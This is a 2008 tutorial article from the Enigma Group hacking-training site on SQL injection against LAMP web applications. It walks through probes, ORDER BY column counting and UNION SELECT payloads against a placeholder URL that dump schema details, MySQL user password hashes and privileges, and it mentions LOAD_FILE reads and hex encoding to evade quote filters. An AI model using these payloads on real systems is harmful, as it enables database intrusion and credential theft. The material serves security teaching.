67 - Web Hacking - Enigma Group

EG Information

Main Index

EG Manual

Disclaimer

Legal Information

Hall of Fame

Hall of Shame

Member Rankings

Members List

Meet the Staff

Training Missions

Read Me First

Basic Skills

Realistic Scenarios

Cryptography

Software Cracking

Linux ELF Binary Cracking

Logical Thinking

Programming

Patching

Steganography

Deface This Wall

/dev/null

/dev/urandom

Knowledge Bank

Discussion Forums

Enigma Chat

RSS Feeds

Articles / Tutorials

Videos

Online EG MP3 Player

Enigma Zine

Downloads

Tools

Code Resources

Submit Code

Ajax

ASM

Bash

CPP

Csharp

Delphi

Haskell

Java

Javascript

Jython

Lisp

mIRC

MySQL

Perl

PHP

Python

QBASIC

VisualBasic

Hakipedia: An open collaborative for all your information security needs.

Has Enigma Group Helped You? Then Help Us By Advertising For Us. Place One Of The Following Images On Your Site.

Enigma Group's Articles

SQL Injections Revealed - Submitted By: Link- 2008-09-23 16:01:02

--------------------
| SQL Injection |
--------------------

Description
Server type: LAMP

● Linux

● Apache

● MySQL

● PHP

In this simple article I will go through the basic steps of finding an SQL injection to fully exploiting a database.

Nevertheless this article is never enough! You have dig deeper, you have to try and work hard to acquire the necessary knowledge to launch a full attack and to fetch vulnerabilities.

Let’s start…

Let’s suppose we have the following URL:

http://fakeurl.com/index.php?id=1016

This is a page to post articles extracted from a database. Please note that not all urls having this form should be connected to a database! Some of them just extract the text from local .txt files or they are just includes?

Anyway, let’s test if this database can be injected with other code:

http://fakeurl.com/index.php?id=10160 or 1=1--

If you get a blank page or an error is displayed then you’ve got a vulnerability, if not don’t worry try this one:

http://fakeurl.com/index.php?id=10160 and 1=0--

The purpose here is to display informative error. Again you should get a blank page or an error.

If you are lucky, then you should proceed with your attack:

http://fakeurl.com/index.php?id=10160 ORDER BY 1--

Increment the order till you get a blank page or an error page, this will help us determine the column set size. Let’s suppose you get a blank page when u reached the number seven, this means that the number of columns that we can poison is 6. The next step will to union queries. Why we use union?

Let’s explain a little bit what: ?id=10160 means:

When a http request is sent in the form or POST or GET the php code records the value after the = sign as a variable which is used after to get data from a database.

?id=1 Is transformed to this query : SELECT FROM table article_title, article_body WHERE id=10160;

Now everything after the 1 is added to the main query:

http://fakeurl.com/index.php?id=10160 ORDER BY 1-- :: SELECT FROM table article_title, article_body WHERE id=10160 ORDER BY 1--;

Now the union part:

SELECT ... SELECT IS NOT VALID!

Thus we use SELECT ... UNION SELECT : to combine two select statements and display both results!

Ok, now that we understood the inside, let’s move on! The next step is to use select to gain more info, don’t forget to replace 10160 with null just so the first SELECT statement isn’t executed!

http://fakeurl.com/index.php?id=null UNION ALL SELECT 1,2,3,4,5,6--

This should display: [And this is only an example]

1

3 5

6

This means that we can replace 1,3,5,6 with functions or other things to display info on the page!

Let’s try the following:

http://fakeurl.com/index.php?id=null UNION ALL SELECT table_schema,2, table_name,4, column_name, ordinal_position from information_schema.COLUMNS--

Where:

table_schema: name of the database

table_name: name of the table in the database

column_name: name of the collumn in the table

ordinal_position: original position of the collumn

A Second statement to use is:

http://fakeurl.com/index.php?id=null UNION ALL SELECT host,2,user,4,password,6 from mysql.user--

host: host the user is valid on

user: users login name

password: encrypted stored hashes

A Third informational statement would be:

http://fakeurl.com/index.php?id=null UNION ALL SELECT version(),2,3,4,5,6--

version(): MySQL database version

Another Statement: [1]

http://fakeurl.com/index.php?id=null UNION ALL SELECT grantee,2, table_catalog,4, privilege_type, is_grantable from information_schema.USER_PRIVILEGES--

grantee: user reflecting the privileges

table_catalog: information regarding table catalog

privilege_type: the permission granted to the user

is_grantable: is the permission grantable

If the user on the database has file permissions, the LOAD_FILE routine can be used to extract and view the contents of files on the filesystem!

In order to bypass quote filtration we will be using an ascii -> hexadecimal string conversion utility. This effectively bypasses most quote filtration done via the application.

[1]: Taken from Understanding MySQL Union Poisoining | Jason A. Medeiros

I hope you made a good understanding of these injections, there are still a lot more to learn, you have MSSQL, PostgreSQL, ORACLE database that you need to learn? Plus knowing php is very helpful!

Please do not rely on this article to rank yourself among the best, this is very basic but still very helpful? Being the best is all about knowing why things happen!

Warm Regards,

Link-

Comments [0]

Return to Web Hacking category list

EG Information

Training Missions

Knowledge Bank

Code Resources

Enigma Group's Articles

Who's Online